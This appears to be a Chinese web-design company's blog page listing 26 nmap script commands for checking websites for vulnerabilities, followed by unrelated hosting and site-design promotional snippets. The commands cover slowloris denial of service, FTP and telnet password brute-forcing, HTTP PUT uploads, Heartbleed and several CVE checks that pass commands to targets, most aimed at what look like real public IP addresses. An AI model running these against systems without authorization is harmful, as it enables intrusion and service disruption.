贵州做网站公司
贵州做网站公司~专业!靠谱!
10年网站模板开发经验,熟悉国内外开源网站程序,包括DEDECMS,WordPress,ZBlog,Discuz! 等网站程序,可为您提供网站建设,网站克隆,仿站,网页设计,网站制作,网站推广优化等服务。我们专注高端营销型网站,企业官网,集团官网,自适应网站,手机网站,网络营销,网站优化,网站服务器环境搭建以及托管运维等。为客户提供一站式网站解决方案!!!

如何用nmap扫描网站漏洞

贵州做网站公司 时间:2023-04-28 04:02:48

用nmap扫描网站漏洞的命令有:

1 http 拒绝服务

nmap –max-parallelism 800–script http-slowloris scanme.nmap.org

2.IIS 短文件泄露

nmap -p 8080 –script http-iis-short-name-brute 61.142.64.176

3.ftp弱口令暴力破解

nmap –script ftp-brute –script-args brute.emptypass=true,ftp-brute.timeout=30,userdb=/root/dirtionary/usernames.txt,brute.useraspass=true,passdb=/root/dirtionary/passwords.txt,brute.threads=3,brute.delay=6 203.195.139.153

4.检测CVE-2011-2523中的ftp-vsftpd-backdoor

nmap -T2 –script ftp-vsftpd-backdoor 211.139.201.240

5.验证http中开启的-methods 方法

nmap -T3 –script http-methods –script-args http.test-all=true,http.url-path=/www.haoshangjia.com

6.验证HTTP.sys 远程代码执行

nmap -sV –script http-vuln-cve2015-1635 203.195.139.153

7.验证 SSL POODLE information leak

nmap -sV -p 443 –version-light –script ssl-poodle 218.19.141.16

8.验证http 中开启了put 方法

nmap –script http-put –script-args http-put.url=/uploads/testput.txt,http-put.file=/root/put.txt 218.19.141.16

9.验证MySQL 匿名访问

nmap –script mysql-empty-password 203.195.139.153

10.验证cve2015-1427 漏洞

nmap –script http-vuln-cve2015-1427 –script-args command=ls 203.195.139.153

11.验证cve2014-8877漏洞

nmap -Pn –script http-vuln-cve2014-8877 –script-args http-vuln-cve2014-8877.cmd=dir,http-vuln-cve2014-8877.uri=/WordPress 42.96.170.128

12.验证Cisco ASA中的CVE-2014-2126,CVE-2014-2127,CVE-2014-21,CVE-2014-2129漏洞

nmap -p 443 –script http-vuln-cve2014-2126,http-vuln-cve2014-2127,http-vuln-cve2014-2128,http-vuln-cve2014-2129 203.195.139.153

13.验证低安全的 SSHv1,sslv2协议

nmap –script sshv1,sslv2 www.haoshangjia.com

14.验证CVE-2014-0224 ssl-ccs-injection

nmap -Pn –script ssl-ccs-injection 203.195.139.153

15.验证ssl-cert证书问题

nmap -v -v –script ssl-cert 203.195.139.153

16.验证SSL证书的有限期

nmap -Pn –script ssl-date www.haoshangjia.com

17.验证CVE-2014-0160 OpenSSL Heartbleed bug

nmap -p 443 –script ssl-heartbleed,ssl-known-key 203.195.139.153

18.验证 Debian OpenSSL keys

nmap -p 443 –script ssl-known-key 203.195.139.153

19.验证弱加密SSL套件

nmap –script ssl-enum-ciphers 203.195.139.153

20.验证CVE 2015-4000

nmap –script ssl-dh-params www.haoshangjia.com

21.验证多种SSL漏洞问题

nmap 203.195.139.153 –vv –script sshv1,ssl-ccs-injection,ssl-cert,ssl-date,ssl-dh-params,ssl-enum-ciphers,ssl-google-cert-catalog,ssl-heartbleed,ssl-known-key,sslv2

22.在网络中检测某主机是否存在窃听他人流量

nmap –script sniffer-detect 10.10.167.5

23.暴力破解telnet

nmap -p 23 –script telnet-brute –script-args userdb=myusers.lst,passdb=mypwds.lst –script-args telnet-brute.timeout=8s 203.195.139.153

24.验证telnet是否支持加密

nmap –script telnet-encryption 203.195.139.153

25.精准地确认端口上运行的服务

nmap -sV –script unusual-port 42.96.170.128

26.收集VNC信息

nmap –script vnc-info 203.195.139.153

  想要建立网站的朋友们应该都知道,域名购买成功之后,接着就是要购买空间的问题的,但是我们也要提前了解一下空间的价格哦,贵州做网站公司空间价格怎么样?贵州做网站公司的小编这就给大家分析一下。  贵州做网站公司空间价格  以100m的空间为例,国内价格从10元一300元不等,一般正常价格在90元左右的还是可以有一定保障,过低已经超出成本价了...

  说起这个空间和域名大部分的人都认为这两个是一起的,因为客户习惯性的就一起说空间域名,对这两者之间的区别不太明白,打个比方来说,域名就是家里的详细地址,那么空间就是房子了,其实这两个根本不是一回事,只是在一起经常的工作,你不太明白也没有关系,贵州做网站公司接下来的这篇文章主要讲述的是空间和域名的区别,以及注册域名的时候要注意的事项。  自己起域名要注意注意...

网站空间也称为主机空间,就是存放网站数据内容的空间,相当于现实生活中人住的房子一样,而网站空间就是指网站所住的地方。现实生活中,房子的面积有大有小,而网站空间也是一样的,有的主机空间配置较高,适合放置大型网站,配置较低则适合放置中小网站。一、什么是网站空间?网站空间就是装载网站数据信息的集合体,这个集合体被架设在一个纯数字的IP地上。你买了空间以后,空间商会给你一个控制台,控制台就会详细显示你的空...

本文目录导读:明确网站定位与目标独特的设计风格响应式设计高效的网站优化交互体验设计安全与稳定性数据分析与优化在当今数字化时代,互联网已经成为人们生活、工作不可或...

本文目录导读:企业网站的设计目标企业网站设计的关键要素在当今的数字化时代,企业网站已经成为企业展示形象、推广产品和服务的重要平台,一个优秀的企业网站设计能够吸引...

本文目录导读:明确网站目标设计网站页面开发网站功能整合网站内容推广与优化维护与更新随着互联网的快速发展,企业网站已经成为企业展示形象、推广产品和服务的重要平台,...

TOP